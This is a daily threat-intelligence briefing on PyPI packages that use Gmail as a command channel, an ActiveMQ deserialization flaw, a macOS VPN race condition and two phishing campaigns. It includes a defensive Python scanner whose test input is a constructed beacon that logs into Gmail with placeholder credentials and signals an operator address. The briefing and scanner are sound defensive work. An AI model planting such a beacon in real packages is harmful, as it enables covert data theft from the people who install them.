Cyware Daily Threat Intelligence, May 01, 2025

Daily Threat Briefing • May 1, 2025
Some PyPI packages are doing more than importing functions. Researchers uncovered seven malicious Python packages under the “Coffin” naming scheme, using Gmail’s SMTP service as a stealthy C2 channel. Hardcoded credentials let the malware establish outbound tunnels via port 465, send activation signals, and quietly exfiltrate data.
Apache ActiveMQ users should be on high alert. A flaw in its .NET Message Service library now lets remote attackers inject code by abusing deserialization. All versions prior to the latest update are at risk, so prompt patching is essential to protect your systems.
Emails that look like official Social Security alerts are turning into dangerous gateways. In the new Molatori phishing campaign, attackers send messages claiming your Social Security Statement is ready to download. Once you install the ScreenConnect client they push, remote access is granted, and sensitive data gets swept away, thanks to convincing links from compromised WordPress sites.
Hive0117 drops new DarkWatchman malware version
The Hive0117 group is conducting a phishing campaign targeting Russian firms across various sectors using a modified version of the DarkWatchman malware. The campaign involved mass emails with the subject "Documents from 04/29/2025," which carried password-protected archives. Once opened, these archives triggered an infection chain that installed DarkWatchman, which is capable of evading standard antivirus detection.
Malicious Python packages use Gmail as C2
Seven malicious Python packages uploaded to PyPI have been discovered using Gmail's SMTP service as a covert C2 channel. The packages, which follow the "Coffin" naming convention, enable attackers to exfiltrate data, execute commands, and establish persistent tunnels that bypass traditional security controls. They use hardcoded Gmail credentials to establish outbound tunnels and send activation signals to attacker-controlled email addresses. Because the malware initiates outbound SMTP connections to Gmail on port 465, its traffic blends in with legitimate mail and is difficult to distinguish from it.
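The two indicators the briefing describes, an SMTP client pointed at Gmail's submission port and credentials hardcoded as string literals, can both be found statically before a package is ever installed. The following is an added example written for this briefing, not code from the researchers or from the packages themselves: it parses a package's Python source with the standard `ast` module and flags `smtplib.SMTP`/`SMTP_SSL` constructors aimed at `smtp.gmail.com` or port 465 (port 587, the STARTTLS submission port, is also flagged as an assumed generalization beyond the page), plus any `.login()` call whose username and password are literals. The sample sources are constructed for the demonstration; no real credentials or package names are used.

```python
import ast
from dataclasses import dataclass

# Indicators from the briefing: Gmail SMTP as C2, port 465.
# Port 587 is an assumed addition (STARTTLS submission), not from the page.
SUSPECT_HOSTS = {"smtp.gmail.com"}
SUSPECT_PORTS = {465, 587}


@dataclass
class Finding:
    line: int
    reason: str


def _const_str(node):
    """Return the value if node is a string literal, else None."""
    if isinstance(node, ast.Constant) and isinstance(node.value, str):
        return node.value
    return None


def _const_int(node):
    """Return the value if node is an int literal (not bool), else None."""
    if isinstance(node, ast.Constant) and isinstance(node.value, int) \
            and not isinstance(node.value, bool):
        return node.value
    return None


def _call_name(call):
    """Dotted name of a call target, e.g. 'smtplib.SMTP_SSL' or 's.login'."""
    func, parts = call.func, []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
    return ".".join(reversed(parts))


def scan_source(src: str) -> list[Finding]:
    """Flag SMTP clients to suspect hosts/ports and literal login credentials."""
    findings = []
    for node in ast.walk(ast.parse(src)):
        if not isinstance(node, ast.Call):
            continue
        name = _call_name(node)
        if name.endswith("SMTP_SSL") or name.endswith("SMTP"):
            # Positional (host, port) or keyword arguments; only literals count.
            host = _const_str(node.args[0]) if node.args else None
            port = _const_int(node.args[1]) if len(node.args) > 1 else None
            for kw in node.keywords:
                if kw.arg == "host":
                    host = _const_str(kw.value)
                elif kw.arg == "port":
                    port = _const_int(kw.value)
            if host in SUSPECT_HOSTS or port in SUSPECT_PORTS:
                findings.append(Finding(node.lineno, f"SMTP client to {host}:{port}"))
        elif name.endswith(".login") and len(node.args) >= 2:
            user, pwd = _const_str(node.args[0]), _const_str(node.args[1])
            if user is not None and pwd is not None:
                findings.append(Finding(node.lineno, f"hard-coded credentials for {user}"))
    return findings


# Constructed sample: the pattern described in the briefing (not real malware).
SAMPLE_SUSPECT = '''
from smtplib import SMTP_SSL

def _beacon():
    s = SMTP_SSL("smtp.gmail.com", 465)
    s.login("bot-account@example.com", "placeholder-app-password")
    s.sendmail("bot-account@example.com", "operator@example.com", "activated")
'''

# Constructed sample: legitimate use that reads configuration from the environment.
SAMPLE_BENIGN = '''
import os, smtplib

def notify(msg):
    s = smtplib.SMTP(os.environ["SMTP_HOST"], int(os.environ["SMTP_PORT"]))
    s.login(os.environ["SMTP_USER"], os.environ["SMTP_PASS"])
    s.sendmail(os.environ["SMTP_USER"], "ops@example.com", msg)
'''

if __name__ == "__main__":
    for label, src in (("suspect", SAMPLE_SUSPECT), ("benign", SAMPLE_BENIGN)):
        print(label, [(f.line, f.reason) for f in scan_source(src)])
```

Run over every `.py` file in an unpacked wheel or sdist (including `setup.py`, where install-time code runs) before allowing the package into an internal index; a hit on both indicators in one module is a strong reason to quarantine it for manual review rather than a false-positive-free verdict, since a literal host alone is common in legitimate notification code.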
Vulnerability in Apache ActiveMQ
A critical vulnerability in Apache ActiveMQ’s .NET Message Service library, identified as CVE-2025-29953, allows remote attackers to execute arbitrary code on unpatched systems. This flaw, with a CVSS score of 8.1, is due to improper validation of user-supplied data during deserialization, permitting malicious payload injections. The vulnerability affects all versions of ActiveMQ prior to the latest update, which was released on April 30.
Critical flaw in Cato Networks macOS VPN client
A critical vulnerability in Cato Networks' macOS VPN client has been disclosed, allowing attackers with limited access to execute arbitrary code with root privileges. This vulnerability, tracked as ZDI-25-252, stems from a race condition in the client's installation process, affecting all versions prior to April 2025. Cato Networks has not yet released an official fix.
New phishing campaign installs ScreenConnect
The new Molatori phishing campaign has been targeting users with emails that appear to come from the U.S. Social Security Administration, claiming that their Social Security Statement is ready for download. The emails contain attachments disguised as legitimate files, such as "ReceiptApril2025Pdfc.exe." Once victims download and install the ScreenConnect client, cybercriminals gain remote access to their computers, enabling them to exfiltrate sensitive data, including banking information and personal identification numbers. The campaign leverages compromised WordPress sites to appear credible.